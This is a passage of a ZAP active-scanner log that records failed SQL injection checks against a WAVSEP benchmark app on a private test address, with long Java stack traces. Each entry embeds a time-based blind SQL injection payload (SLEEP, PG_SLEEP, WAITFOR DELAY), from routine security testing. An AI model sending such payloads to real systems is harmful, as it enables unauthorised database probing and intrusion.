org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679312 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND (SELECT * FROM (SELECT(SLEEP(5)))STpW) AND 'ePVY'='ePVY] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND (SELECT * FROM (SELECT(SLEEP(5)))STpW) AND 'ePVY'='ePVY at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679313 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND (SELECT * FROM (SELECT(SLEEP(5)))Hpuh) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND (SELECT * FROM (SELECT(SLEEP(5)))Hpuh) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679314 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 8258=(SELECT 8258 FROM PG_SLEEP(5)) AND 'bjbi'='bjbi] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 8258=(SELECT 8258 FROM PG_SLEEP(5)) AND 'bjbi'='bjbi at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679315 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT * FROM (SELECT(SLEEP(5)))bIJW)-- qVJX] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT * FROM (SELECT(SLEEP(5)))bIJW)-- qVJX at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679315 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 3737=(SELECT 3737 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 3737=(SELECT 3737 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679317 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 3250=(SELECT 3250 FROM PG_SLEEP(5)) AND (1666=1666] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 3250=(SELECT 3250 FROM PG_SLEEP(5)) AND (1666=1666 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679317 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 6309=(SELECT 6309 FROM PG_SLEEP(5))-- EBPY] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 6309=(SELECT 6309 FROM PG_SLEEP(5))-- EBPY at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679318 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 1107=(SELECT 1107 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 1107=(SELECT 1107 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679318 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (4301=4301] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (4301=4301 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679319 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 7245=(SELECT 7245 FROM PG_SLEEP(5)) AND ('rblu'='rblu] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 7245=(SELECT 7245 FROM PG_SLEEP(5)) AND ('rblu'='rblu at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679320 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679321 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('NUbw'='NUbw] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('NUbw'='NUbw at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679321 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 1714=(SELECT 1714 FROM PG_SLEEP(5)) AND 'zAag'='zAag] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 1714=(SELECT 1714 FROM PG_SLEEP(5)) AND 'zAag'='zAag at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679322 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' WAITFOR DELAY 